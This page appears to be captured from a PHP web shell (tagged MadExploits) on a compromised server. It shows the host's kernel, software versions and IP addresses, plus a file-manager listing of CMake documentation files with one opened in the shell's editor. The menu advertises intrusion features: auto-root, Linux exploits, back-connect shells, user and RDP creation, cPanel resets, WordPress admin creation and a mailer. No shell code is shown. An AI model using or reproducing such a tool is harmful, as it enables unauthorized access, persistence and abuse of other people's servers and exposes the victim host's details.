Linux server.kiran-academy.com 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
: 194.233.91.196 | : 216.73.216.216
Cant Read [ /etc/named.conf ]
7.4.32
finalho
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
cmake3 /
Help /
prop_sf /
[ HOME SHELL ]
Name
Size
Permission
Action
ABSTRACT.rst
309
B
-rw-r--r--
AUTORCC_OPTIONS.rst
611
B
-rw-r--r--
AUTOUIC_OPTIONS.rst
603
B
-rw-r--r--
COMPILE_DEFINITIONS.rst
1.3
KB
-rw-r--r--
COMPILE_DEFINITIONS_CONFIG.rst
399
B
-rw-r--r--
COMPILE_FLAGS.rst
721
B
-rw-r--r--
COMPILE_OPTIONS.rst
844
B
-rw-r--r--
EXTERNAL_OBJECT.rst
237
B
-rw-r--r--
Fortran_FORMAT.rst
383
B
-rw-r--r--
GENERATED.rst
1.54
KB
-rw-r--r--
HEADER_FILE_ONLY.rst
1.17
KB
-rw-r--r--
INCLUDE_DIRECTORIES.rst
828
B
-rw-r--r--
KEEP_EXTENSION.rst
351
B
-rw-r--r--
LABELS.rst
235
B
-rw-r--r--
LANGUAGE.rst
449
B
-rw-r--r--
LOCATION.rst
138
B
-rw-r--r--
MACOSX_PACKAGE_LOCATION.rst
1.66
KB
-rw-r--r--
OBJECT_DEPENDS.rst
1.08
KB
-rw-r--r--
OBJECT_OUTPUTS.rst
364
B
-rw-r--r--
SKIP_AUTOGEN.rst
374
B
-rw-r--r--
SKIP_AUTOMOC.rst
278
B
-rw-r--r--
SKIP_AUTORCC.rst
280
B
-rw-r--r--
SKIP_AUTOUIC.rst
482
B
-rw-r--r--
SKIP_PRECOMPILE_HEADERS.rst
528
B
-rw-r--r--
SKIP_UNITY_BUILD_INCLUSION.rst
508
B
-rw-r--r--
SYMBOLIC.rst
238
B
-rw-r--r--
Swift_DEPENDENCIES_FILE.rst
204
B
-rw-r--r--
Swift_DIAGNOSTICS_FILE.rst
114
B
-rw-r--r--
VS_COPY_TO_OUT_DIR.rst
194
B
-rw-r--r--
VS_CSHARP_tagname.rst
625
B
-rw-r--r--
VS_DEPLOYMENT_CONTENT.rst
555
B
-rw-r--r--
VS_DEPLOYMENT_CONTENT.rst.rena...
554
B
-rw-r--r--
VS_DEPLOYMENT_LOCATION.rst
403
B
-rw-r--r--
VS_INCLUDE_IN_VSIX.rst
229
B
-rw-r--r--
VS_RESOURCE_GENERATOR.rst
228
B
-rw-r--r--
VS_SHADER_DISABLE_OPTIMIZATION...
280
B
-rw-r--r--
VS_SHADER_ENABLE_DEBUG.rst
266
B
-rw-r--r--
VS_SHADER_ENTRYPOINT.rst
124
B
-rw-r--r--
VS_SHADER_FLAGS.rst
103
B
-rw-r--r--
VS_SHADER_MODEL.rst
149
B
-rw-r--r--
VS_SHADER_OBJECT_FILE_NAME.rst
216
B
-rw-r--r--
VS_SHADER_OUTPUT_HEADER_FILE.r...
146
B
-rw-r--r--
VS_SHADER_TYPE.rst
93
B
-rw-r--r--
VS_SHADER_VARIABLE_NAME.rst
136
B
-rw-r--r--
VS_TOOL_OVERRIDE.rst
171
B
-rw-r--r--
VS_XAML_TYPE.rst
237
B
-rw-r--r--
WRAP_EXCLUDE.rst
357
B
-rw-r--r--
XCODE_EXPLICIT_FILE_TYPE.rst
290
B
-rw-r--r--
XCODE_FILE_ATTRIBUTES.rst
324
B
-rw-r--r--
XCODE_LAST_KNOWN_FILE_TYPE.rst
339
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : COMPILE_DEFINITIONS.rst
COMPILE_DEFINITIONS ------------------- Preprocessor definitions for compiling a source file. The ``COMPILE_DEFINITIONS`` property may be set to a semicolon-separated list of preprocessor definitions using the syntax ``VAR`` or ``VAR=value``. Function-style definitions are not supported. CMake will automatically escape the value correctly for the native build system (note that CMake language syntax may require escapes to specify some values). This property may be set on a per-configuration basis using the name ``COMPILE_DEFINITIONS_<CONFIG>`` where ``<CONFIG>`` is an upper-case name (ex. ``COMPILE_DEFINITIONS_DEBUG``). CMake will automatically drop some definitions that are not supported by the native build tool. Xcode does not support per-configuration definitions on source files. .. include:: /include/COMPILE_DEFINITIONS_DISCLAIMER.txt Contents of ``COMPILE_DEFINITIONS`` may use :manual:`cmake-generator-expressions(7)` with the syntax ``$<...>``. See the :manual:`cmake-generator-expressions(7)` manual for available expressions. However, :generator:`Xcode` does not support per-config per-source settings, so expressions that depend on the build configuration are not allowed with that generator. Generator expressions should be preferred instead of setting the alternative per-configuration property.
Close